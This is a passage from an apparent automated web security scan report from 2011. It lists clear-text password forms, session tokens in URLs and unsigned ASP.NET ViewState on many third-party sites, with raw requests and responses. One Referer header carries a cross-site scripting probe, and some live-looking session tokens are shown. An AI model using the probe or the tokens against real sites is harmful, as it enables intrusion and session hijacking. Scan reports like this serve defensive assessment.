HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:31:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 19199
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCSTSSSAT=PNGDKFFDNIOMOEEIOLACAFIF; path=/
Cache-control: private

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor
...[SNIP]...
</script>

<form name="form_login" method="post" action="login.asp?logintimes=1" onSubmit="return checkform_login()">
<table border="0" width="190" align="center" cellspacing="0" cellpadding="1">
...[SNIP]...
<td width="100%"><input class="txtbox-home-regis" name="password" size="20" value="" type="password" style="Width:180px;"></td>
...[SNIP]...

9.3. http://www.extrabux.com/favicon.ico previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.extrabux.com
Path:	/favicon.ico

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.extrabux.com/users/login

The form contains the following password field:

password

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.extrabux.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html
Date: Tue, 03 May 2011 10:34:39 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.2.12 (Ubuntu)
Set-Cookie: PHPSESSID=2f2ecf4bf2c1a47c48a77b5635c59a1b; path=/
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.10-2ubuntu6.9
Content-Length: 7479
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equi
...[SNIP]...
</div>
       <form action="/users/login" method="post">
           <div id="loginBox" class="loginBoxClose">
...[SNIP]...
<input type="text" name="email" id="inputEmail" />
               <input type="password" name="password" id="inputPass" />
               <input type="image" src="http://static.extrabux.com/images/btn-login-small.gif" alt="Log In" id="loginBtn" value="Log In" />
...[SNIP]...

9.4. http://www.restaurantrow.com/favicon.ico previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.restaurantrow.com
Path:	/favicon.ico

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.restaurantrow.com/l_redirect.cfm

The form contains the following password field:

password

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.restaurantrow.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

9.5. http://www.voa.org/favicon.ico previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.voa.org
Path:	/favicon.ico

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.voa.org/favicon.ico

The form contains the following password field:

VOALogin$Password

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.voa.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:39:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=4dtcaangyku0vj20he5uzw45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 31468

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<body>
<form name="VOAForm" method="post" action="/favicon.ico" id="VOAForm">
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTM4ODY0NzY0NA9kFgYCAw8WAh4GYWN0aW9uBQwvZmF2aWNvbi5pY28WDAIFD2QWBAIBDw8WAh4LTmF2aWdhdGVVcmwFVGh0dHA6Ly9zdXBwb3J0LnZvbHVudGVlcnN
...[SNIP]...
<br />
<input name="VOALogin$Password" type="password" id="VOALogin_Password" class="small" onfocus="this.value = '';" onKeyPress="javascript:if (event.keyCode == 13) __doPostBack('VOALogin$LoginButton','')" />
<a id="VOALogin_LoginButton" class="red" href="javascript:__doPostBack('VOALogin$LoginButton','')">
...[SNIP]...

9.6. http://www.xcomment.com/favicon.ico previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.xcomment.com
Path:	/favicon.ico

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.xcomment.com/loginsubmit.php

The form contains the following password field:

password

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.xcomment.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:15:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 38308

<html>
<head>
<meta name="description" content="X-Comment - MySpace Graphics and Pictures for MySpace Comments">
<meta name="keywords" content=" myspace picture comments, myspace comments, myspace g
...[SNIP]...
<table width="960" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="b0ccfe"><form name="loginsubmit" method="post" action="http://www.xcomment.com/loginsubmit.php">
<tr>
...[SNIP]...
</a>
<input name="password" type="password" id="password" style="font-size: 10px; color: d9ebff; border-size: 1; border-color: b0cbff; background-image: url(http://www.xcomment.com/images/searchbg.jpg); width:80;" onFocus="this.value=''">
<a href="http://www.xcomment.com/login.php" class="navlink">
...[SNIP]...

9.7. http://www.xcomment.com/favicon.ico previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.xcomment.com
Path:	/favicon.ico

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.xcomment.com/loginsubmit.php

The form contains the following password field:

password

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.xcomment.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:15:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 38308

<html>
<head>
<meta name="description" content="X-Comment - MySpace Graphics and Pictures for MySpace Comments">
<meta name="keywords" content=" myspace picture comments, myspace comments, myspace g
...[SNIP]...
<table width="149" height="68" border="0" cellpadding="0" cellspacing="0">
<form name="loginsubmit" method="post" action="http://www.xcomment.com/loginsubmit.php">
<tr>
...[SNIP]...
<td class="categorynavlink"><input name="password" type="password" id="password" size="10" ></td>
...[SNIP]...

10. Session token in URL previous next
There are 3 instances of this issue:

http://www.facebook.com/extern/login_status.php
http://www.methodisthealth.org/favicon.ico
http://www.vc.edu/favicon.ico

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

10.1. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.facebook.com/extern/login_status.php?api_key=131596456859393&app_id=131596456859393&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df37a6dbeb107bc8%26origin%3Dhttp%253A%252F%252Fwww.maysville-online.com%252Ff757c089334886%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df20704db67a2986%26origin%3Dhttp%253A%252F%252Fwww.maysville-online.com%252Ff757c089334886%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3c618c18ba88b2%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1c909b5c15df4a%26origin%3Dhttp%253A%252F%252Fwww.maysville-online.com%252Ff757c089334886%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3c618c18ba88b2&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3f360ff8facad6%26origin%3Dhttp%253A%252F%252Fwww.maysville-online.com%252Ff757c089334886%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3c618c18ba88b2&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3ce263417e7d06%26origin%3Dhttp%253A%252F%252Fwww.maysville-online.com%252Ff757c089334886%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3c618c18ba88b2&sdk=joey&session_version=3

Request

GET /extern/login_status.php?api_key=131596456859393&app_id=131596456859393&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df37a6dbeb107bc8%26origin%3Dhttp%253A%252F%252Fwww.maysville-online.com%252Ff757c089334886%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df20704db67a2986%26origin%3Dhttp%253A%252F%252Fwww.maysville-online.com%252Ff757c089334886%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3c618c18ba88b2%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1c909b5c15df4a%26origin%3Dhttp%253A%252F%252Fwww.maysville-online.com%252Ff757c089334886%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3c618c18ba88b2&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3f360ff8facad6%26origin%3Dhttp%253A%252F%252Fwww.maysville-online.com%252Ff757c089334886%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3c618c18ba88b2&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3ce263417e7d06%26origin%3Dhttp%253A%252F%252Fwww.maysville-online.com%252Ff757c089334886%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3c618c18ba88b2&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.53.44.63
X-Cnection: close
Date: Tue, 03 May 2011 15:42:39 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.

10.2. http://www.methodisthealth.org/favicon.ico previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.methodisthealth.org
Path:	/favicon.ico

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.methodisthealth.org/portal/css/portal011479975932581147955364402.css;jsessionid=BD0FDF85696CE3D3050CF7D42C078BAE

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.methodisthealth.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:43:28 GMT
Content-Type: text/html
Content-Length: 17455
Via: 1.1 www.methodisthealth.org (Access Gateway 3.0.4-94)

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Page Not found!</title>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache, no-store, no-cache">
<link rel="stylesheet" type="text/css" href="/portal/css/portal011479975932581147955364402.css;jsessionid=BD0FDF85696CE3D3050CF7D42C078BAE">

<base target="_top">
...[SNIP]...

10.3. http://www.vc.edu/favicon.ico previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.vc.edu
Path:	/favicon.ico

Issue detail

The response contains the following links that appear to contain session tokens:

http://nextelonline.nextel.com/NASApp/onlinestore/Action/CustomAisleLanding?token=GzXkcUHU5wTk9EGnYKXTsqAWHck

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vc.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: CFID=1036549;expires=Thu, 25-Apr-2041 10:37:23 GMT;path=/
Set-Cookie: CFTOKEN=c9ed98125e6d8b65-165D0D47-D954-B9B6-E7BCBA3CF75B99B5;expires=Thu, 25-Apr-2041 10:37:23 GMT;path=/
Set-Cookie: JSESSIONID=8430f8d03a4cffc5679c5026747373c65324;path=/
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:37:23 GMT
Content-Length: 36781

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Te
...[SNIP]...
<div align="center" style="margin-top:20px;"><a href="http://nextelonline.nextel.com/NASApp/onlinestore/Action/CustomAisleLanding?token=GzXkcUHU5wTk9EGnYKXTsqAWHck" target="_blank"><img src="/images/sidebar-sprint2.gif" width="243" height="53" alt="Sprint Student Discounts - Click Here" border="0" />
...[SNIP]...

11. ASP.NET ViewState without MAC enabled previous next
There are 2 instances of this issue:

http://www.ashop.com.au/favicon.ico
http://www.findire.com/favicon.ico

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.

11.1. http://www.ashop.com.au/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ashop.com.au
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ashop.com.au
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:36:13 GMT
Server: Microsoft-IIS/6.0
S: 1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: SD=CBC79EF83B2840399EF683813BFC9F01; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 865

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>

</title>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE2MTY2ODcyMjlkZA==" />
...[SNIP]...

11.2. http://www.findire.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.findire.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.findire.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:44:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 55461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><base href="http://www.f
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE4MjI5MDA5MjQPZBYCZg9kFgICBQ9kFgoCAQ9kFgICAQ8WBh4EaHJlZgVGaHR0cDovL3d3dy5tYXJlYXp1bC5jb20vbHV4dXJ5LWludmVzdG1lbnQtY29uZG9zL2ZpbmRpcmUtbWFyZWF6dWwuaHRtbB4Hb25jbGljawUXSW5jcmVhc2VNeUNsaWNrcygnMzE2JykeBnRhcmdldAUGX2JsYW5rFgYCAQ8PFgQeCEltYWdlVXJsBR4uLi9BZHZlcnRpc2VtZW50SW1hZ2VzLzMxNi5qcGceB1Rvb2xUaXAFCE1hcmVhenVsZGQCAw8PFgIeB1Zpc2libGVoZGQCBQ8PFgIfBWhkZAIDD2QWQGYPDxYCHgtOYXZpZ2F0ZVVybAXJAWh0dHA6Ly90cmFuc2xhdGUuZ29vZ2xlLmNvbS90cmFuc2xhdGU/anM9biZwcmV2PV90JmhsPWVuJmllPVVURi04JnU9aHR0cCUzQSUyRiUyRnd3dy5maW5kaXJlLmNvbSUyRiUyRlBhZ2VDb250ZW50LmFzcHg/NDA0O2h0dHA6JTJGJTJGd3d3LmZpbmRpcmUuY29tOjgwJTJGZmF2aWNvbi5pY28mc2w9ZW4mdGw9cHQmaGlzdG9yeV9zdGF0ZTA9JnN3YXA9MWRkAgEPDxYCHwYFzAFodHRwOi8vdHJhbnNsYXRlLmdvb2dsZS5jb20vdHJhbnNsYXRlP2pzPW4mcHJldj1fdCZobD1lbiZpZT1VVEYtOCZ1PWh0dHAlM0ElMkYlMkZ3d3cuZmluZGlyZS5jb20lMkYlMkZQYWdlQ29udGVudC5hc3B4PzQwNDtodHRwOiUyRiUyRnd3dy5maW5kaXJlLmNvbTo4MCUyRmZhdmljb24uaWNvJnNsPWVuJnRsPXpoLUNOJmhpc3Rvcnlfc3RhdGUwPSZzd2FwPTFkZAICDw8WAh8GBckBaHR0cDovL3RyYW5zbGF0ZS5nb29nbGUuY29tL3RyYW5zbGF0ZT9qcz1uJnByZXY9X3QmaGw9ZW4maWU9VVRGLTgmdT1odHRwJTNBJTJGJTJGd3d3LmZpbmRpcmUuY29tJTJGJTJGUGFnZUNvbnRlbnQuYXNweD80MDQ7aHR0cDolMkYlMkZ3d3cuZmluZGlyZS5jb206ODAlMkZmYXZpY29uLmljbyZzbD1lbiZ0bD1ociZoaXN0b3J5X3N0YXRlMD0mc3dhcD0xZGQCAw8PFgIfBgXJAWh0dHA6Ly90cmFuc2xhdGUuZ29vZ2xlLmNvbS90cmFuc2xhdGU/anM9biZwcmV2PV90JmhsPWVuJmllPVVURi04JnU9aHR0cCUzQSUyRiUyRnd3dy5maW5kaXJlLmNvbSUyRiUyRlBhZ2VDb250ZW50LmFzcHg/NDA0O2h0dHA6JTJGJTJGd3d3LmZpbmRpcmUuY29tOjgwJTJGZmF2aWNvbi5pY28mc2w9ZW4mdGw9Y3MmaGlzdG9yeV9zdGF0ZTA9JnN3YXA9MWRkAgQPDxYCHwYFyQFodHRwOi8vdHJhbnNsYXRlLmdvb2dsZS5jb20vdHJhbnNsYXRlP2pzPW4mcHJldj1fdCZobD1lbiZpZT1VVEYtOCZ1PWh0dHAlM0ElMkYlMkZ3d3cuZmluZGlyZS5jb20lMkYlMkZQYWdlQ29udGVudC5hc3B4PzQwNDtodHRwOiUyRiUyRnd3dy5maW5kaXJlLmNvbTo4MCUyRmZhdmljb24uaWNvJnNsPWVuJnRsPWRhJmhpc3Rvcnlfc3RhdGUwPSZzd2FwPTFkZAIFDw8WAh8GBckBaHR0cDovL3RyYW5zbGF0ZS5nb29nbGUuY29tL3RyYW5zbGF0ZT9qcz1uJnByZXY9X3QmaGw9ZW4maWU9VVRGLTgmdT1odHRwJTNBJTJGJTJGd3d3LmZpbmRpcmUuY29tJTJGJTJGUGFnZUNvbnRlbnQuYXNweD80MDQ7aHR0cDolMkYlMkZ3d3cuZmluZGlyZS5jb206ODAlMkZmYXZpY29uLmljbyZzbD1lbiZ0bD1hciZoaXN0b3J5X3N0YXRlMD0mc3dhcD0xZGQCBg8PFgIfBgXJAWh0dHA6Ly90cmFuc2xhdGUuZ29vZ2xlLmNvbS90cmFuc2xhdGU/anM9biZwcmV2PV90JmhsPWVuJmllPVVURi04JnU9aHR0cCUzQSUyRiUyRnd3dy5maW5kaXJlLmNvbSUyRiUyRlBhZ2VDb250ZW50LmFzcHg/NDA0O2h0dHA6JTJGJTJGd3d3LmZpbmRpcmUuY29tOjgwJTJGZmF2aWNvbi5pY28mc2w9ZW4mdGw9bmwmaGlzdG9yeV9zdGF0ZTA9JnN3YXA9MWRkAgcPDxYCHwYFyQFodHRwOi8vdHJhbnNsYXRlLmdvb2dsZS5jb20vdHJhbnNsYXRlP2pzPW4mcHJldj1fdCZobD1lbiZpZT1VVEYtOCZ1PWh0dHAlM0ElMkYlMkZ3d3cuZmluZGlyZS5jb20lMkYlMkZQYWdlQ29udGVudC5hc3B4PzQwNDtodHRwOiUyRiUyRnd3dy5maW5kaXJlLmNvbTo4MCUyRmZhdmljb24uaWNvJnNsPWVuJnRsPWZpJmhpc3Rvcnlfc3RhdGUwPSZzd2FwPTFkZAIIDw8WAh8GBckBaHR0cDovL3RyYW5zbGF0ZS5nb29nbGUuY29tL3RyYW5zbGF0ZT9qcz1uJnByZXY9X3QmaGw9ZW4maWU9VVRGLTgmdT1odHRwJTNBJTJGJTJGd3d3LmZpbmRpcmUuY29tJTJGJTJGUGFnZUNvbnRlbnQuYXNweD80MDQ7aHR0cDolMkYlMkZ3d3cuZmluZGlyZS5jb206ODAlMkZmYXZpY29uLmljbyZzbD1lbiZ0bD1mciZoaXN0b3J5X3N0YXRlMD0mc3dhcD0xZGQCCQ8PFgIfBgXJAWh0dHA6Ly90cmFuc2xhdGUuZ29vZ2xlLmNvbS90cmFuc2xhdGU/anM9biZwcmV2PV90JmhsPWVuJmllPVVURi04JnU9aHR0cCUzQSUyRiUyRnd3dy5maW5kaXJlLmNvbSUyRiUyRlBhZ2VDb250ZW50LmFzcHg/NDA0O2h0dHA6JTJGJTJGd3d3LmZpbmRpcmUuY29tOjgwJTJGZmF2aWNvbi5pY28mc2w9ZW4mdGw9ZGUmaGlzdG9yeV9zdGF0ZTA9JnN3YXA9MWRkAgoPDxYCHwYFyQFodHRwOi8vdHJhbnNsYXRlLmdvb2dsZS5jb20vdHJhbnNsYXRlP2pzPW4mcHJldj1fdCZobD1lbiZpZT1VVEYtOCZ1PWh0dHAlM0ElMkYlMkZ3d3cuZmluZGlyZS5jb20lMkYlMkZQYWdlQ29udGVudC5hc3B4PzQwNDtodHRwOiUyRiUyRnd3dy5maW5kaXJlLmNvbTo4MCUyRmZhdmljb24uaWNvJnNsPWVuJnRsPWVsJmhpc3Rvcnlfc3RhdGUwPSZzd2FwPTFkZAILDw8WAh8GBckBaHR0cDovL3RyYW5zbGF0ZS5nb29nbGUuY29tL3RyYW5zbGF0ZT9qcz1uJnByZXY9X3QmaGw9ZW4maWU9VVRGLTgmdT1odHRwJTNBJTJGJTJGd3d3LmZpbmRpcmUuY29tJTJGJTJGUGFnZUNvbnRlbnQuYXNweD80MDQ7aHR0cDolMkYlMkZ3d3cuZmluZGlyZS5jb206ODAlMkZmYXZpY29uLmljbyZzbD1lbiZ0bD1pdCZoaXN0b3J5X3N0YXRlMD0mc3dhcD0xZGQCDA8PFgIfBgXJAWh0dHA6Ly90cmFuc2xhdGUuZ29vZ2xlLmNvbS90cmFuc2xhdGU/anM9biZwcmV2PV90JmhsPWVuJmllPVVURi04JnU9aHR0cCUzQSUyRiUyRnd3dy5maW5kaXJlLmNvbSUyRiUyRlBhZ2VDb250ZW50LmFzcHg/NDA0O2h0dHA6JTJGJTJGd3d3LmZpbmRpcmUuY29tOjgwJTJGZmF2aWNvbi5pY28mc2w9ZW4mdGw9bm8maGlzdG9yeV9zdGF0ZTA9JnN3YXA9MWRkAg0PDxYCHwYFyQFodHRwOi8vdHJhbnNsYXRlLmdvb2dsZS5jb20vdHJhbnNsYXRlP2pzPW4mcHJldj1fdCZobD1lbiZpZT1VVEYtOCZ1PWh0dHAlM0ElMkYlMkZ3d3cuZmluZGlyZS5jb20lMkYlMkZQYWdlQ29udGVudC5hc3B4PzQwNDtodHRwOiUyRiUyRnd3dy5maW5kaXJlLmNvbTo4MCUyRmZhdmljb24uaWNvJnNsPWVuJnRsPXBsJmhpc3Rvcnlfc3RhdGUwPSZzd2FwPTFkZAIODw8WAh8GBckBaHR0cDovL3RyYW5zbGF0ZS5nb29nbGUuY29tL3RyYW5zbGF0ZT9qcz1uJnByZXY9X3QmaGw9ZW4maWU9VVRGLTgmdT1odHRwJTNBJTJGJTJGd3d3LmZpbmRpcmUuY29tJTJGJTJGUGFnZUNvbnRlbnQuYXNweD80MDQ7aHR0cDolMkYlMkZ3d3cuZmluZGlyZS5jb206ODAlMkZmYXZpY29uLmljbyZzbD1lbiZ0bD1wdCZoaXN0b3J5X3N0YXRlMD0mc3dhcD0xZGQCDw8PFgIfBgXJAWh0dHA6Ly90cmFuc2xhdGUuZ29vZ2xlLmNvbS90cmFuc2xhdGU/anM9biZwcmV2PV90JmhsPWVuJmllPVVURi04JnU9aHR0cCUzQSUyRiUyRnd3dy5maW5kaXJlLmNvbSUyRiUyRlBhZ2VDb250ZW50LmFzcHg/NDA0O2h0dHA6JTJGJTJGd3d3LmZpbmRpcmUuY29tOjgwJTJGZmF2aWNvbi5pY28mc2w9ZW4mdGw9cnUmaGlzdG9yeV9zdGF0ZTA9JnN3YXA9MWRkAhAPDxYCHwYFyQFodHRwOi8vdHJhbnNsYXRlLmdvb2dsZS5jb20vdHJhbnNsYXRlP2pzPW4mcHJldj1fdCZobD1lbiZpZT1VVEYtOCZ1PWh0dHAlM0ElMkYlMkZ3d3cuZmluZGlyZS5jb20lMkYlMkZQYWdlQ29udGVudC5hc3B4PzQwNDtodHRwOiUyRiUyRnd3dy5maW5kaXJlLmNvbTo4MCUyRmZhdmljb24uaWNvJnNsPWVuJnRsPWt1Jmhpc3Rvcnlfc3RhdGUwPSZzd2FwPTFkZAIRDw8WAh8GBckBaHR0cDovL3RyYW5zbGF0ZS5nb29nbGUuY29tL3RyYW5zbGF0ZT9qcz1uJnByZXY9X3QmaGw9ZW4maWU9VVRGLTgmdT1odHRwJTNBJTJGJTJGd3d3LmZpbmRpcmUuY29tJTJGJTJGUGFnZUNvbnRlbnQuYXNweD80MDQ7aHR0cDolMkYlMkZ3d3cuZmluZGlyZS5jb206ODAlMkZmYXZpY29uLmljbyZzbD1lbiZ0bD1lcyZoaXN0b3J5X3N0YXRlMD0mc3dhcD0xZGQCEg8PFgIfBgXJAWh0dHA6Ly90cmFuc2xhdGUuZ29vZ2xlLmNvbS90cmFuc2xhdGU/anM9biZwcmV2PV90JmhsPWVuJmllPVVURi04JnU9aHR0cCUzQSUyRiUyRnd3dy5maW5kaXJlLmNvbSUyRiUyRlBhZ2VDb250ZW50LmFzcHg/NDA0O2h0dHA6JTJGJTJGd3d3LmZpbmRpcmUuY29tOjgwJTJGZmF2aWNvbi5pY28mc2w9ZW4mdGw9c3YmaGlzdG9yeV9zdGF0ZTA9JnN3YXA9MWRkAhMPDxYCHwYFyQFodHRwOi8vdHJhbnNsYXRlLmdvb2dsZS5jb20vdHJhbnNsYXRlP2pzPW4mcHJldj1fdCZobD1lbiZpZT1VVEYtOCZ1PWh0dHAlM0ElMkYlMkZ3d3cuZmluZGlyZS5jb20lMkYlMkZQYWdlQ29udGVudC5hc3B4PzQwNDtodHRwOiUyRiUyRnd3dy5maW5kaXJlLmNvbTo4MCUyRmZhdmljb24ua